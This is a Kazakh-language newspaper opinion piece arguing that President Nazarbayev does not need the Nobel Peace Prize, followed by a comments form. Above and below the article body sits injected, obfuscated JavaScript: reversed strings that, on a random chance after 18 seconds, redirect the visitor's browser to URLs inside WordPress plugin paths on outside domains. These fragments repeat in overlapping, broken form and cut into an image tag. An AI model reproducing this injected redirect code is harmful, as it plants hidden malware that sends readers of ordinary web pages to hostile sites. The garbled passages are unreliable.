Руслан ЖЕЛДІБАЙ. Назарбаевқа Нобель сыйлығы қажет пе?

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to; margin-right: autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to;» src=»http://jaqsy.kz/sites/default/files/imagecache/170×150/nobprem11.jpg» alt=»alt» title=»title» height=»150″ width=»170″ />

 Жыл сайын Нобель сыйлығының иегерлері анықталатын уақыт жақындағанда Қазақстан Президенті Нұрсұлтан Назарбаевты «Бейбітшілік үшін» номинациясына ұсынатын ұйымдар мен азаматтар аса белсенділік таныта бастайды. Биыл бұл сыйлыққа Елбасыны шешен-ингуш ұлттық-мәдени орталығы мен қырғыз парламенті, АҚШ конгресінің мүшесі Ени Фалеомаваига, норвегиялық «Bіke for Рeace» («Велосипедшілер бейбітшілікті қолдайды») ұйымы, Торе Наерланд бастаған норвег депутаттары ұсынды.

Нобель сыйлығының «Бейбітшілік үшін» номинациясын 1896 жылы Альфред Нобельдің өзі бекіткен. Ол әлемдегі бейбітшілікті нығайтуға қомақты үлес қосқан тұлғаларға беріледі. Нобель қорының регламентіне сәйкес үміткерлерді ұсыну құқығы мыналарға ғана берілген:

1. Нобель комитетінің қазіргі және бұрынғы мүшелері, сонымен қатар Нобель институты кеңесші ретінде тағайындаған азаматтар;
2. Әртүрлі мемлекеттердің ұлттық парламент мүшелері мен үкіметі, парламентаралық кеңестің мүшелері;
3. Гаагадағы Халықаралық арбитраждық соттың мүшелері;
4. Халықаралық бейбітшілік мәселелері жөніндегі бюроның тұрақты комиссиясының мүшелері;
5. Халықаралық құқық институтының мүшелері;
6. Университеттердің саяси ғылымдар, құқық және философия бойынша профессорлары;
7. «Бейбітшілік үшін» Нобель сыйлығының лауреаттары.

Биыл жалпы саны 241 үміткер тіркеліпті (53 қоғамдық және халықаралық ұйымдардың ұсынуымен). 2011 жылы бұл сыйлыққа Либерия президенті Элен Джонсон-Серлиф, осы елдің бейбітшіліксүйгіш белсендісі Лейма Гбове және Йемендегі құқық қорғаушы Тауаккул Карман лайық деп танылды. Оларға сыйлық «Әйелдердің қауіпсіздігі мен бейбітшілік жолында зорлықсыз күрес жүргізгені» үшін табыс етілді.

Бұл номинацияның басқаларынан айырмашылығы екеу ғана. Ең алдымен, ол Стокгольмде емес, Ослода тапсырылады. Екіншіден, ең саясиланғаны осы. Соңғы кездері бұл жағы аса қатты аңғарылып жүр. Номинация тарихына көз жүгіртсек, лауреаттардың көпшілігі сыйлық алғаны үшін емес, жасаған ісі үшін тарихта қалған. Ал саясиланған тұрғыда алғандарының көпшілігін бүгінде ешкім танымайды да. Бұл номинация бүгінде Батыстың өзіне жақпаған мемлекеттерге сес көрсету құралына айналып бара жатқандай. Сыйлықтың өткен жылғы Қытай диссидентіне берілуі осы ойымызды дәлелдей түссе керек.

Сондықтан да, біз Қазақстан Президентіне Нобель сыйлығын алу қажет емес деп есептейміз. Неге?

Біріншіден, бүгінде Президенттің Нобель сыйлығының «Бейбітшілік үшін» номинациясын алуына мүдделі азаматтардың көпшілігі жақсы ниетте емес сияқты. Олай ойлауға негіз де бар. Назарбаев лауреат атанса, халық арасында «біздің Президент атаққұмар» деген пікір қалыптасуы мүмкін. Қоғамдық тұрақсыздықты аңсаушылардың басты арманы орындалуы да ғажап емес. Кезінде Асқар Ақаевты да «туысқандарыңыз сондай білікті екен!» деп өтірік мақтап-мақтап, оларды мемлекеттік қызметтерге тартқызып, кейіннен «Көрдіңіздер ме, Ақаев жанына кілең өз ағайындарын жинап алды!» деп айыптап, елде бүлік бастағандарды әлі ұмыта қойған жоқпыз. Бұл бізге керек пе?

Екіншіден, Президенттің жасаған жұмыстары онсыз да тарихта қалмақ. Семей атом полигонын жабу туралы жарлыққа қол қоюын Президентті сынайтын азаматтардың өзі де ерлік деп мойындайды. Қазақ халқына зор қасірет әкелген аждаһаны жоюы – сөзсіз, тарихта қалар қадам. Назарбаев ол полигонды жабар тұста тарихта қалуды емес, халқының амандығын ойлағаны да түсінікті. Кім не десе, о десін, Назарбаев тәуелсіз қазақ елінің тұңғыш Президенті ретінде де есте қалады. Ендеше бұл сыйлық оған не үшін қажет?

Тарихта сол сыйлықты алмай-ақ елінің, ұлтының мүддесі үшін жұмыс атқарған азаматтар жетерлік. Олар ешуақытта сыйлық үшін еңбек еткен емес. Сол үшін де олар халықтың жүрегінде мәңгі қалды.

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tory/524″>http://jaqsy.kz/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tory/524

http://kyzmet-gazeti.kz/{jcomments on}


  • Related Posts

    Сапалы білім – саналы тәрбие және білім туризмін қалай дамытамыз? Шымкент қаласының саладағы жетістігі қандай?

    Шымкент – еліміздің іскерлік, экономикалық, мәдени өмірінің, инновациялардың орталығы болып табылатын және Қазақстан ғана емес, бүкіл Орталық Азияда маңызды орын алатын ең қарқынды дамып келе жатқан қала. Шымкент қаласы өзінің…

    БІЛІМ БАСҚАРМАСЫНЫҢ БАСШЫСЫ АЗАМАТТАРДЫҢ ТАЛАП-ТІЛЕКТЕРІН ТЫҢДАДЫ

    Қалалық білім басқармасының басшысы Нұргүл Шәмшиеваның кезекті бірыңғай азаматтарды қабылдау күні өтті.

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *

    Яндекс.Метрика